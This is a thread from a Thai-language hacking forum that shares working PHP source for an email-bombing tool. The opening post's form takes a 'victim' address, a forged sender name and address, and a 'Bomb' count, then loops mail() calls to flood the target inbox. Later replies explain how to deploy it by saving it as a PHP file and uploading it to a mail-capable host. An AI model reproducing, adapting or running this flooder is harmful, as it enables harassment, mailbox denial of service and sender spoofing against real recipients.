Results 1 to 6 of 6

Thread: PHP Flood mail

  1. #1
    zolution
    Guest


    Unhidden Content - Enjoy The View!

    <?php
    if(!empty($_POST)) {
    echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\"/ >";
    $to_email=$_POST[&#39;ToMail&#39;];
    $from_name=$_POST[&#39;FromName&#39;];
    $from_email=$_POST[&#39;FromMail&#39;];
    $loop=$_POST[&#39;Loop&#39;];
    $subject=$_POST[&#39;Subject&#39;];
    $msg=$_POST[&#39;Msg&#39;];

    for($i=0; $i < $loop; $i++) {
    if(!mail($to_email,$subject,$msg,"From: ".$from_name."<$i".$from_email.">")){
    die($error);
    } //end if
    else {
    $a=$i++;
    echo "ส่งครั้งที่ ".$i." สมบูรณ์
    ";
    } //end else
    } //end for
    } //end if

    else {
    ?>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
    <form method="post" action="<? echo $_SERVER[&#39;PHP_SELF&#39;]; ?>">
    <input name="ToMail" type="text"/> Mail เหยื่อของเรา&lt;To Mail&gt;

    <input name="FromName" type="text"/> จากใครดีเอ๋ย&lt;From Name&gt;

    <input name="FromMail" type="text"/> จากเมลล์อะไร&lt;From Mail&gt;

    <input name="Loop" type="text" /> จำนวนที่ต้องการส่ง&lt;Bomb&gt;

    <input name="Subject" type="text"/> หัวข้อ&lt;Subject&gt;

    <textarea name="Msg" cols="50" rows="6"></textarea>

    <input type="reset" name="Reset" value="Reset" />
    <input type="submit" name="Submit" value="Sent Mail" />
    </form>
    <?
    }
    ?>


    โค้ต php ถล่มเมลครับ

  2. #2


    ต้องขอบคุณท่าน zolution มากๆนะครับ สำหรับบทความดีๆอย่างนี้ครับ


    ..........................Thank You!!!..............................
    ............................ขอบคุณครับ................................
    NEXT BIG TING!

  3. #3


    เอาไปใส่ใน notepad แล้ว
    เซฟเป็นไฟล์อะไรครับ

    ขอบคุณครับ
    [img]http://www.danasoft.com/vipersig.jpg[/img]

  4. #4
    Junior Member
    Join Date
    Jul 2007
    Posts
    27


    ขอบคุณครับ เยี่ยมจริงๆ
    <div align="center">[img]http://photos1.hi5.com/0008/313/731/Gdxw.S313731-02.gif[/img]</div>

  5. #5
    Junior Member
    Join Date
    Jul 2007
    Posts
    10


    ขอรายละเอียดวิธีการใช้หน่อยครับว่าต้องทำไงบ้างแล้ว ต้องเซฟเป็น php หรือไงครับแล้ว run หรอครับ
    [url="http://Smartnet.Flixya.com"]Music Video[/url]

    [url="http://Smartnet.Flixya.com"]http://Smartnet.Flixya.com[/url]

    [url="http://law.myokhost.com"]Law Article[/url]

    [url="http://Law.Myokhost.com"]http://Law.Myokhost.com[/url]

  6. #6
    Junior Member
    Join Date
    Feb 2007
    Posts
    4


    ก้อน่าจะเป็น php นะ ใส่ notepad เซฟเปงไฟล์ php แล้วอัพขึ้นโฮสท่่สนับสนุนฟังชั่นส่งเมลคับ

    ถึงจะไม่เห็นโค้ดก็น่าจะใช่ คิคิ

Similar Threads

  1. Flood with 10,000 bots
    By orange_soi9 in forum Security Tools
    Replies: 0
    Last Post: 18-11-2008, 01:17 PM
  2. Flood phpBB, MercuryBoard, Vbulletin, Ipb
    By conanjung in forum Security Tools
    Replies: 0
    Last Post: 22-01-2008, 01:08 PM
  3. collection of hacking tools (flood,msn,md5)
    By snapter in forum Security Tools
    Replies: 0
    Last Post: 17-11-2007, 07:32 PM
  4. vBulletin Flood in register (มี SS นะครับ)
    By sniffer in forum Hacking, Exploit Articles/Tutorial/Techniques
    Replies: 0
    Last Post: 17-09-2007, 07:23 PM
  5. เทคนิดการ Flood ในวงแลน [Internet]
    By buffet in forum Newbie / Starter Hacker
    Replies: 37
    Last Post: 05-08-2007, 12:53 AM

Members who have read this thread : 0

Actions : (View-Readers)

There are no names to display.

Members who have read this thread: 0

There are no members to list at the moment.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •